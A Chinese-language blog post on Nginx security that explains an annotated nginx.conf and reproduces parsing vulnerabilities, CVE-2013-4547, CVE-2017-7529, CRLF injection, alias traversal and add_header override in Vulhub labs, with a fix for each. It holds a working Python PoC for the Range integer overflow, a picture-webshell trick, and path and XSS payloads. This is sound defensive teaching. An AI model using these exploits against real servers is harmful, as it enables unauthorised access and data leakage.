Nginx安全总结

Nginx安全总结

Nginx作为最常见的Web服务器中间件之一,这里小结一下其安全的问题。

基本使用教程请看:Nginx基础教程

Nginx基础

Nginx中HTTP请求流程

Nginx中一个HTTP请求的处理流程如图:

img

Nginx配置文件详解

######Nginx配置文件nginx.conf中文详解#####

#定义Nginx运行的用户和用户组
user www www;

#nginx进程数,建议设置为等于CPU总核心数。
worker_processes 8;

#全局错误日志定义类型,[ debug | info | notice | warn | error | crit ]
error_log /usr/local/nginx/logs/error.log info;

#进程pid文件
pid /usr/local/nginx/logs/nginx.pid;

#指定进程可以打开的最大描述符:数目
#工作模式与连接数上限
#这个指令是指当一个nginx进程打开的最多文件描述符数目,理论值应该是最多打开文件数(ulimit -n)与nginx进程数相除,但是nginx分配请求并不是那么均匀,所以最好与ulimit -n 的值保持一致。
#现在在linux 2.6内核下开启文件打开数为65535,worker_rlimit_nofile就相应应该填写65535。
#这是因为nginx调度时分配请求到进程并不是那么的均衡,所以假如填写10240,总并发量达到3-4万时就有进程可能超过10240了,这时会返回502错误。
worker_rlimit_nofile 65535;


events
{
    #参考事件模型,use [ kqueue | rtsig | epoll | /dev/poll | select | poll ]; epoll模型
    #是Linux 2.6以上版本内核中的高性能网络I/O模型,linux建议epoll,如果跑在FreeBSD上面,就用kqueue模型。
    #补充说明:
    #与apache相类,nginx针对不同的操作系统,有不同的事件模型
    #A)标准事件模型
    #Select、poll属于标准事件模型,如果当前系统不存在更有效的方法,nginx会选择select或poll
    #B)高效事件模型
    #Kqueue:使用于FreeBSD 4.1+, OpenBSD 2.9+, NetBSD 2.0 和 MacOS X.使用双处理器的MacOS X系统使用kqueue可能会造成内核崩溃。
    #Epoll:使用于Linux内核2.6版本及以后的系统。
    #/dev/poll:使用于Solaris 7 11/99+,HP/UX 11.22+ (eventport),IRIX 6.5.15+ 和 Tru64 UNIX 5.1A+。
    #Eventport:使用于Solaris 10。 为了防止出现内核崩溃的问题, 有必要安装安全补丁。
    use epoll;

    #单个进程最大连接数(最大连接数=连接数*进程数)
    #根据硬件调整,和前面工作进程配合起来用,尽量大,但是别把cpu跑到100%就行。每个进程允许的最多连接数,理论上每台nginx服务器的最大连接数为。
    worker_connections 65535;

    #keepalive超时时间。
    keepalive_timeout 60;

    #客户端请求头部的缓冲区大小。这个可以根据你的系统分页大小来设置,一般一个请求头的大小不会超过1k,不过由于一般系统分页都要大于1k,所以这里设置为分页大小。
    #分页大小可以用命令getconf PAGESIZE 取得。
    #[root@web001 ~]# getconf PAGESIZE
    #4096
    #但也有client_header_buffer_size超过4k的情况,但是client_header_buffer_size该值必须设置为“系统分页大小”的整倍数。
    client_header_buffer_size 4k;

    #这个将为打开文件指定缓存,默认是没有启用的,max指定缓存数量,建议和打开文件数一致,inactive是指经过多长时间文件没被请求后删除缓存。
    open_file_cache max=65535 inactive=60s;

    #这个是指多长时间检查一次缓存的有效信息。
    #语法:open_file_cache_valid time 默认值:open_file_cache_valid 60 使用字段:http, server, location 这个指令指定了何时需要检查open_file_cache中缓存项目的有效信息.
    open_file_cache_valid 80s;

    #open_file_cache指令中的inactive参数时间内文件的最少使用次数,如果超过这个数字,文件描述符一直是在缓存中打开的,如上例,如果有一个文件在inactive时间内一次没被使用,它将被移除。
    #语法:open_file_cache_min_uses number 默认值:open_file_cache_min_uses 1 使用字段:http, server, location  这个指令指定了在open_file_cache指令无效的参数中一定的时间范围内可以使用的最小文件数,如果使用更大的值,文件描述符在cache中总是打开状态.
    open_file_cache_min_uses 1;

    #语法:open_file_cache_errors on | off 默认值:open_file_cache_errors off 使用字段:http, server, location 这个指令指定是否在搜索一个文件时记录cache错误.
    open_file_cache_errors on;
}



#设定http服务器,利用它的反向代理功能提供负载均衡支持
http
{
    #文件扩展名与文件类型映射表
    include mime.types;

    #默认文件类型
    default_type application/octet-stream;

    #默认编码
    #charset utf-8;

    #服务器名字的hash表大小
    #保存服务器名字的hash表是由指令server_names_hash_max_size 和server_names_hash_bucket_size所控制的。参数hash bucket size总是等于hash表的大小,并且是一路处理器缓存大小的倍数。在减少了在内存中的存取次数后,使在处理器中加速查找hash表键值成为可能。如果hash bucket size等于一路处理器缓存的大小,那么在查找键的时候,最坏的情况下在内存中查找的次数为2。第一次是确定存储单元的地址,第二次是在存储单元中查找键 值。因此,如果Nginx给出需要增大hash max size 或 hash bucket size的提示,那么首要的是增大前一个参数的大小.
    server_names_hash_bucket_size 128;

    #客户端请求头部的缓冲区大小。这个可以根据你的系统分页大小来设置,一般一个请求的头部大小不会超过1k,不过由于一般系统分页都要大于1k,所以这里设置为分页大小。分页大小可以用命令getconf PAGESIZE取得。
    client_header_buffer_size 32k;

    #客户请求头缓冲大小。nginx默认会用client_header_buffer_size这个buffer来读取header值,如果header过大,它会使用large_client_header_buffers来读取。
    large_client_header_buffers 4 64k;

    #设定通过nginx上传文件的大小
    client_max_body_size 8m;

    #开启高效文件传输模式,sendfile指令指定nginx是否调用sendfile函数来输出文件,对于普通应用设为 on,如果用来进行下载等应用磁盘IO重负载应用,可设置为off,以平衡磁盘与网络I/O处理速度,降低系统的负载。注意:如果图片显示不正常把这个改成off。
    #sendfile指令指定 nginx 是否调用sendfile 函数(zero copy 方式)来输出文件,对于普通应用,必须设为on。如果用来进行下载等应用磁盘IO重负载应用,可设置为off,以平衡磁盘与网络IO处理速度,降低系统uptime。
    sendfile on;

    #开启目录列表访问,合适下载服务器,默认关闭。
    autoindex on;

    #此选项允许或禁止使用socke的TCP_CORK的选项,此选项仅在使用sendfile的时候使用
    tcp_nopush on;

    tcp_nodelay on;

    #长连接超时时间,单位是秒
    keepalive_timeout 120;

    #FastCGI相关参数是为了改善网站的性能:减少资源占用,提高访问速度。下面参数看字面意思都能理解。
    fastcgi_connect_timeout 300;
    fastcgi_send_timeout 300;
    fastcgi_read_timeout 300;
    fastcgi_buffer_size 64k;
    fastcgi_buffers 4 64k;
    fastcgi_busy_buffers_size 128k;
    fastcgi_temp_file_write_size 128k;

    #gzip模块设置
    gzip on; #开启gzip压缩输出
    gzip_min_length 1k;    #最小压缩文件大小
    gzip_buffers 4 16k;    #压缩缓冲区
    gzip_http_version 1.0;    #压缩版本(默认1.1,前端如果是squid2.5请使用1.0)
    gzip_comp_level 2;    #压缩等级
    gzip_types text/plain application/x-javascript text/css application/xml;    #压缩类型,默认就已经包含textml,所以下面就不用再写了,写上去也不会有问题,但是会有一个warn。
    gzip_vary on;

    #开启限制IP连接数的时候需要使用
    #limit_zone crawler $binary_remote_addr 10m;



    #负载均衡配置
    upstream jh.w3cschool.cn {

        #upstream的负载均衡,weight是权重,可以根据机器配置定义权重。weigth参数表示权值,权值越高被分配到的几率越大。
        server 192.168.80.121:80 weight=3;
        server 192.168.80.122:80 weight=2;
        server 192.168.80.123:80 weight=3;

        #nginx的upstream目前支持4种方式的分配
        #1、轮询(默认)
        #每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。
        #2、weight
        #指定轮询几率,weight和访问比率成正比,用于后端服务器性能不均的情况。
        #例如:
        #upstream bakend {
        #    server 192.168.0.14 weight=10;
        #    server 192.168.0.15 weight=10;
        #}
        #2、ip_hash
        #每个请求按访问ip的hash结果分配,这样每个访客固定访问一个后端服务器,可以解决session的问题。
        #例如:
        #upstream bakend {
        #    ip_hash;
        #    server 192.168.0.14:88;
        #    server 192.168.0.15:80;
        #}
        #3、fair(第三方)
        #按后端服务器的响应时间来分配请求,响应时间短的优先分配。
        #upstream backend {
        #    server server1;
        #    server server2;
        #    fair;
        #}
        #4、url_hash(第三方)
        #按访问url的hash结果来分配请求,使每个url定向到同一个后端服务器,后端服务器为缓存时比较有效。
        #例:在upstream中加入hash语句,server语句中不能写入weight等其他的参数,hash_method是使用的hash算法
        #upstream backend {
        #    server squid1:3128;
        #    server squid2:3128;
        #    hash $request_uri;
        #    hash_method crc32;
        #}

        #tips:
        #upstream bakend{#定义负载均衡设备的Ip及设备状态}{
        #    ip_hash;
        #    server 127.0.0.1:9090 down;
        #    server 127.0.0.1:8080 weight=2;
        #    server 127.0.0.1:6060;
        #    server 127.0.0.1:7070 backup;
        #}
        #在需要使用负载均衡的server中增加 proxy_pass http://bakend/;

        #每个设备的状态设置为:
        #1.down表示单前的server暂时不参与负载
        #2.weight为weight越大,负载的权重就越大。
        #3.max_fails:允许请求失败的次数默认为1.当超过最大次数时,返回proxy_next_upstream模块定义的错误
        #4.fail_timeout:max_fails次失败后,暂停的时间。
        #5.backup: 其它所有的非backup机器down或者忙的时候,请求backup机器。所以这台机器压力会最轻。

        #nginx支持同时设置多组的负载均衡,用来给不用的server来使用。
        #client_body_in_file_only设置为On 可以讲client post过来的数据记录到文件中用来做debug
        #client_body_temp_path设置记录文件的目录 可以设置最多3层目录
        #location对URL进行匹配.可以进行重定向或者进行新的代理 负载均衡
    }



    #虚拟主机的配置
    server
    {
        #监听端口
        listen 80;

        #域名可以有多个,用空格隔开
        server_name www.w3cschool.cn w3cschool.cn;
        index index.html index.htm index.php;
        root /data/www/w3cschool;

        #对******进行负载均衡
        location ~ .*.(php|php5)?$
        {
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fastcgi.conf;
        }

        #图片缓存时间设置
        location ~ .*.(gif|jpg|jpeg|png|bmp|swf)$
        {
            expires 10d;
        }

        #JS和CSS缓存时间设置
        location ~ .*.(js|css)?$
        {
            expires 1h;
        }

        #日志格式设定
        #$remote_addr与$http_x_forwarded_for用以记录客户端的ip地址;
        #$remote_user:用来记录客户端用户名称;
        #$time_local: 用来记录访问时间与时区;
        #$request: 用来记录请求的url与http协议;
        #$status: 用来记录请求状态;成功是200,
        #$body_bytes_sent :记录发送给客户端文件主体内容大小;
        #$http_referer:用来记录从那个页面链接访问过来的;
        #$http_user_agent:记录客户浏览器的相关信息;
        #通常web服务器放在反向代理的后面,这样就不能获取到客户的IP地址了,通过$remote_add拿到的IP地址是反向代理服务器的iP地址。反向代理服务器在转发请求的http头信息中,可以增加x_forwarded_for信息,用以记录原有客户端的IP地址和原来客户端的请求的服务器地址。
        log_format access '$remote_addr - $remote_user [$time_local] "$request" '
        '$status $body_bytes_sent "$http_referer" '
        '"$http_user_agent" $http_x_forwarded_for';

        #定义本虚拟主机的访问日志
        access_log  /usr/local/nginx/logs/host.access.log  main;
        access_log  /usr/local/nginx/logs/host.access.404.log  log404;

        #对 "/" 启用反向代理
        location / {
            proxy_pass http://127.0.0.1:88;
            proxy_redirect off;
            proxy_set_header X-Real-IP $remote_addr;

            #后端的Web服务器可以通过X-Forwarded-For获取用户真实IP
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            #以下是一些反向代理的配置,可选。
            proxy_set_header Host $host;

            #允许客户端请求的最大单文件字节数
            client_max_body_size 10m;

            #缓冲区代理缓冲用户端请求的最大字节数,
            #如果把它设置为比较大的数值,例如256k,那么,无论使用firefox还是IE浏览器,来提交任意小于256k的图片,都很正常。如果注释该指令,使用默认的client_body_buffer_size设置,也就是操作系统页面大小的两倍,8k或者16k,问题就出现了。
            #无论使用firefox4.0还是IE8.0,提交一个比较大,200k左右的图片,都返回500 Internal Server Error错误
            client_body_buffer_size 128k;

            #表示使nginx阻止HTTP应答代码为400或者更高的应答。
            proxy_intercept_errors on;

            #后端服务器连接的超时时间_发起握手等候响应超时时间
            #nginx跟后端服务器连接超时时间(代理连接超时)
            proxy_connect_timeout 90;

            #后端服务器数据回传时间(代理发送超时)
            #后端服务器数据回传时间_就是在规定时间之内后端服务器必须传完所有的数据
            proxy_send_timeout 90;

            #连接成功后,后端服务器响应时间(代理接收超时)
            #连接成功后_等候后端服务器响应时间_其实已经进入后端的排队之中等候处理(也可以说是后端服务器处理请求的时间)
            proxy_read_timeout 90;

            #设置代理服务器(nginx)保存用户头信息的缓冲区大小
            #设置从被代理服务器读取的第一部分应答的缓冲区大小,通常情况下这部分应答中包含一个小的应答头,默认情况下这个值的大小为指令proxy_buffers中指定的一个缓冲区的大小,不过可以将其设置为更小
            proxy_buffer_size 4k;

            #proxy_buffers缓冲区,网页平均在32k以下的设置
            #设置用于读取应答(来自被代理服务器)的缓冲区数目和大小,默认情况也为分页大小,根据操作系统的不同可能是4k或者8k
            proxy_buffers 4 32k;

            #高负荷下缓冲大小(proxy_buffers*2)
            proxy_busy_buffers_size 64k;

            #设置在写入proxy_temp_path时数据的大小,预防一个工作进程在传递文件时阻塞太长
            #设定缓存文件夹大小,大于这个值,将从upstream服务器传
            proxy_temp_file_write_size 64k;
        }


        #设定查看Nginx状态的地址
        location /NginxStatus {
            stub_status on;
            access_log on;
            auth_basic "NginxStatus";
            auth_basic_user_file confpasswd;
            #htpasswd文件的内容可以用apache提供的htpasswd工具来产生。
        }

        #本地动静分离反向代理配置
        #所有jsp的页面均交由tomcat或resin处理
        location ~ .(jsp|jspx|do)?$ {
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_pass http://127.0.0.1:8080;
        }

        #所有静态文件由nginx直接读取不经过tomcat或resin
        location ~ .*.(htm|html|gif|jpg|jpeg|png|bmp|swf|ioc|rar|zip|txt|flv|mid|doc|ppt|
        pdf|xls|mp3|wma)$
        {
            expires 15d; 
        }

        location ~ .*.(js|css)?$
        {
            expires 1h;
        }
    }
}
######Nginx配置文件nginx.conf中文详解#####

Nginx解析漏洞

未知文件解析漏洞

漏洞原理

该漏洞与Nginx版本、PHP版本无关,属于用户配置不当造成的解析漏洞。

两个核心配置:

  • cgi.fix_pathinfo:php.ini的配置项,当该配置项值为1时,用于修复路径,如果当前路径不存在则采用上层路径,比如传入/test.png/1.php路径、由于1.php不存在则会在传给FastCGI处理的路径就变为test.png。该配置项默认为1;
  • security.limit_extensions:php-fpm.conf 配置项,此配置项限制了FastCGI解析文件的类型(即指定什么类型的文件当做PHP代码解析),但此项设置为空时是允许FastCGI将任意类型的文件当做PHP代码来解析的;

环境搭建

直接用的Vulhub:https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/

漏洞复现

先制作一个图片马:

cat info.php >> nginx.png

然后上传图片,访问返回的地址,图片能正常访问:

img

然后访问:

http://172.20.205.137/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png/.php
image-20220602110901249

发现图片以php进行解析。

漏洞分析

漏洞根源就是配置存在问题,直接看配置文件的设置。

先看到php.ini,这里环境没有php.ini文件,直接看php.ini-development或php.ini-production,其中并没有配置cgi.fix_pathino配置项,但是其默认值就是1,即启用修复路径,在前面输入路径/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png/.php时,由于.php不存在,因此实际传入给FastCGI的是/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png路径来进行解析:

image-20220602111424533

接着看php-fpm.conf,文件内容中没有security.limit_extensions配置项,但是include=etc/php-fpm.d/*.conf引入了该目录中的所有.conf文件,在其中的www-2.conf文件中找到了该配置项,且该配置项为空,即没有进行任何限制、可以以PHP代码来解析由上层Nginx传下来的/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png路径文件,从而触发解析漏洞:

image-20220602111913865

修复方法

针对配置项修复即可:

  • 修改php.ini文件中cgi.fix_pathino配置项的值为0;
  • 添加php-fpm.conf文件中security.limit_extensions配置项的值为php,即限定FastCGI只对PHP相关后缀文件进行PHP代码解析;

文件名逻辑漏洞(CVE-2013-4547)

影响版本

Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

漏洞原理

由于Nginx存在文件名逻辑漏洞、会错误地解析请求的URI,导致获取到了错误的文件名,从而可能造成权限绕过、代码执行等安全漏洞。

环境搭建

直接用的Vulhub:https://vulhub.org/#/environments/nginx/CVE-2013-4547/

漏洞复现

最大的危害当然就是解析漏洞了,能解析PHP代码从而执行任意命令。

直接上传WebShell文件,修改文件名后缀为.jpg[空格] ,即在文件后缀名后面追加个空格:

image-20220602113701072

访问:

http://your-ip:8080/uploadfiles/info.jpg[0x20][0x00].php

这里直接在Hex栏修改:

image-20220602113500249

修改好之后复制回去:

image-20220602113434682

当然,除了解析漏洞外,文件名逻辑漏洞还能造成访问限制绕过等的安全风向。

这里修改下nginx.conf配置,/admin/目录限定只能本地访问:

worker_processes  1;

events {
    worker_connections  1024;
}


http {
    include       mime.types;
    default_type  application/octet-stream;

    sendfile        on;
    keepalive_timeout  65;

    server {
        listen       80;
        server_name  localhost;
        root   html;
        index  index.php;

        charset utf-8;


        location /admin/ {
            allow 127.0.0.1;
            deny all;
        }
    }
}

然后在www目录下新建个/admin/index.php文件,内容随意;再创建一个/test[空格]目录(这里需要Linux下创建,因为window不允许文件名最后带空格)

配置好后重启服务,直接访问 /admin/index.php 显示403:

image-20220602141240202

但是可以利用文件名解析漏洞进行访问,绕过了Nginx路由限制:

image-20220602141135510

漏洞分析

漏洞根源就是配置存在问题,直接看配置文件的设置。这里以解析漏洞的实例分析。

先看到nginx.conf,当Nginx匹配到.php结尾的请求,就发送给FastCGI进行解析:

location ~ \.php$ {
    root           html;
    include        fastcgi_params;

    fastcgi_pass   php:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
}

这是很常见的写法,但是在漏洞版本的Nginx中,如果收到shell.jpg[0x20][0x00].php的请求时,这个URI可以匹配上如上图的正则\.php$的Location块,其中Nginx会识别到请求的文件是shell.jpg[0x20],就设置其为SCRIPT_FILENAME的值发送给FastCGI进行解析,而PHP-FPM中并未设置security.limit_extensions配置项的值,从而可以以PHP代码来解析shell.jpg[0x20]文件,触发解析漏洞:

image-20220602142929369

修复方法

  • 升级Nginx版本;
  • 添加php-fpm.conf文件中security.limit_extensions配置项的值为php,即限定FastCGI只对PHP相关后缀文件进行PHP代码解析;

%00截断解析漏洞

这部分Nginx版本过低,已经很少见了。

影响版本

Nginx 0.5., 0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

漏洞原理

对于低版本的Nginx,可以在任意文件名后面添加%00.php进行解析攻击。

如:1.jpg%00.php就会将前面1.jpg文件当成PHP文件进行解析执行。

修复方法

  • 升级Nginx版本;

Nginx整数溢出漏洞(CVE-2017-7529)

影响版本

Nginx 0.5.6 ~ 1.13.2

漏洞原理

Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。

如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。

环境搭建

直接用的Vulhub:https://vulhub.org/#/environments/nginx/CVE-2017-7529/

漏洞复现

正常访问Web页面,是Nginx默认页面,该页面实际上是反向代理的8081端口的内容:

image-20220602144355852

这里直接看P神Vulhub中的PoC:

#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)
print(r.text)

运行python poc.py http://your-ip:8080/后,可以看到是越界读取到了Cache文件头及其内容(Nginx和被代理的服务器之间的响应报文头和Body内容等):

image-20220602144831336

漏洞分析

先看到Nginx配置文件nginx.conf,其中包含了如下conf文件:

proxy_cache_path /tmp/nginx levels=1:2 keys_zone=cache_zone:10m;
proxy_cache_valid 200 10m;

server {
    listen       8081;
    server_name  localhost;

    charset utf-8;

    location / {
        root   /usr/share/nginx/html;
        index  index.html;
    }
}
server {
    listen       8080;
    server_name  localhost;

    charset utf-8;

    location / {
        proxy_pass http://127.0.0.1:8081/;
        proxy_set_header HOST $host;
        proxy_cache cache_zone;
        add_header X-Proxy-Cache $upstream_cache_status;
        proxy_ignore_headers Set-Cookie;
    }
}

看到,其中关键Nginx设置如下:

  • proxy_cache_path:设置缓存文件的路径和参数;
  • proxy_cache_valid:设定缓存有效期;
  • proxy_pass:反向代理配置,参数为代理的目标服务地址;
  • proxy_cache:指定使用的keys_zone名称,这里就是上面的cache_zone;
  • add_header:在Nginx返回的HTTP头中增加一项X-Proxy-Cache,如果缓存命中其值为HIT,未命中则为MISS;
  • proxy_ignore_headers:Nginx不会缓存带有Set-Cookie的返回,因此这里设置忽略该HTTP头;

由此可知,正常访问之后,就会缓存目标页面内容到proxy_cache_path指定的目录中,查看确实存在Cache文件,前面部分是Cache文件头部信息包括Key,后面就是响应报文的内容:

image-20220602145705094

可以看到,这和前面通过PoC脚本触发整数溢出漏洞来获取到的Cache文件内容是一致的。

OK,来看下根源的代码问题,从补丁修复代码看起,主要在ngx_http_range_filter_module.c的ngx_http_range_parse()函数上做了两次修改:

img
img

据此可知,本次整数溢出漏洞的漏洞点正是出在Nginx处理HTTP请求头Range的数值时并没有进行整数溢出漏洞过滤而导致的。其中bytes-range读取的起始范围可能为负数,从而读取缓存文件头部。

更多的漏洞分析请参考:CVE-2017-7529 Nginx整数溢出漏洞分析

修复方法

  • 升级Nginx版本;

Nginx不安全配置

当Nginx配置不当时,也会导致一些安全问题。

下面的环境均搭建自Vulhub:https://vulhub.org/#/environments/nginx/insecure-configuration/

CRLF注入漏洞

漏洞原理

Nginx的内置遍历$uri是指当前的请求URI,不包括任何参数(见$args)。其中,Nginx会对$uri进行解码操作。如果攻击者在URI中注入%0a%0d就会造成CRLF注入漏洞。

Demo

不安全配置示例如下,即直接将$uri拼接到302重定向的地址上,会造成CRLF注入漏洞:

server {
    listen 8080;

    root /usr/share/nginx/html;

    index index.html;

    server_name _;

    location / {
        return 302 https://$host$uri;
    }
}

直接在URI栏注入即可,比如注入Set-Cookie头:

image-20220602150914416

可以往响应报文Body注入XSS payload,但是这里由于Location头的值协议不可控、302这处无法直接在浏览器触发XSS:

image-20220602151056528

防御方法

审计Nginx配置文件中$uri的使用位置,禁止直接用在URL跳转地址的拼接上。

目录穿越漏洞

漏洞原理

Nginx服务器通过设置Alias别名的方式,可以使不在网站根目录下的目录也能被Web访问。

Nginx的配置autoindex作用是自动创建索引,换句话说就是目录浏览功能,当为on时页面可以显示当前目录下所有文件/目录内容,当为off时页面为403 Forbidden。

如果在配置别名(Alias)的时候,忘记在location的目录最后追加/,会导致存在目录穿越漏洞。

Demo

看个不安全的配置示例:

server {
    listen 8081;

    root /usr/share/nginx/html;

    index index.html;

    server_name _;

    autoindex on;

    location /files {
        alias /home/;
    }
}

正常访问,由于autoindex为on,页面就显示了home目录中的所有文件和目录:

image-20220602151542388

访问/files../的时候就会目录穿越:

image-20220602151600557

当然,并非autoindex开启了才能利用,只是说页面会展示出当前目录下所有的文件和目录信息而已,方便查看,即使不开启autoindex也能直接目录穿越获取目标文件、只是访问目录的时候为403而已。

比如去掉autoindex on这个配置后,访问/file../etc/目录时是403,但是访问具体文件就能直接下载了:

image-20220602151832814

注意,此处场景目录穿越只能往上穿一层,示例中刚好上一层就是根目录因此可以看到所有文件和目录,但是实际场景可能目录穿越的利用很有限。

防御方法

在Nginx配置文件中location的目录最后必须要追加/

add_header被覆盖

漏洞原理

add_header是headers模块中定义的一个指令,用来添加HTTP响应头部。

Nginx是分层级组织的,每层可以有自己的指令,子块继承父块的配置;但对于相同指令,子块的配置可以覆盖掉父块的配置。子块中如果设置了add_header,那么就会覆盖掉父块中的add_header,这样就可能会造成一些安全风险。

Demo

不安全的配置示例,原本在Web整站即父块中添加了CSP头和X-Frame-Options头设置的,其在子块/test1目录是直接使用生效的,但是在另一个子块/test2目录中会重新add_header导致前面整站的add_header设置被覆盖:

server {
    listen 8082;

    root /usr/share/nginx/html;

    index index.html;

    server_name _;

    autoindex on;

    add_header Content-Security-Policy "default-src 'self'";
    add_header X-Frame-Options DENY;

    location = /test1 {
        rewrite ^(.*)$ /xss.html break;
    }

    location = /test2 {
        add_header X-Content-Type-Options nosniff;
        rewrite ^(.*)$ /xss.html break;
    }
}

正常访问/test1目录,响应头确实设置了CSP头和X-Frame-Options头,其中页面是引用了一个JS文件:

image-20220602152340552

这个JS文件就是往页面id为m的标签内写入当前URL中#号后面的内容,即存在DOM XSS风险:

image-20220602152410334

这里注意个细节,如果直接引用这个JS脚本,无论后面有没有CSP都无法成功触发XSS,这是因为默认这个输出是对关键字符如尖括号进行了URL编码的,此时需要我们稍微改下app.js的代码,添加个URL解码操作即对获取到URI栏的内容调用decodeURI()函数才能成功:

window.onload = function() {
    var m = document.getElementById('m');
    m.innerHTML = decodeURI(location.hash.substr(1));
}

由于CSP设置为default-src 'self'即只允许同源下的资源,这里/static/app.js是同源资源因此可以加载进来执行,但不允许内联资源(要允许内联资源需要设置’unsafe-inline’,其允许如内联的script元素、javascript: URL、内联的事件处理函数和内联的style元素等)。也就是说,即使注入XSS payload,如下的内联的on事件也是不会执行的:

image-20220602153540726

当我们访问/test2目录时,看到响应报文并没有前面整站设置的CSP头和X-Frame-Options头,而是该子块直接设置的X-Content-Type-Options头,也就是说父块的add_header被子块的add_header覆盖了:

image-20220602153226944

结合前面的存在DOM XSS风险,这里由于没有CSP限制所以能成功触发利用:

image-20220602153509163

注意,这里XSS payload不能用<script>标签、会无法触发执行,这是因为这个DOM操作是用的innerHTML来进行的,需要用如<img>等标签来注入才能成功。

防御方法

非必须不要设置在子块再次配置add_header来覆盖父块的add_header配置;如果业务需要必须设置,则需要严格审计是否会出现相关的安全风险。

参考资料

Nginx 入门指南

Nginx安全小结

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇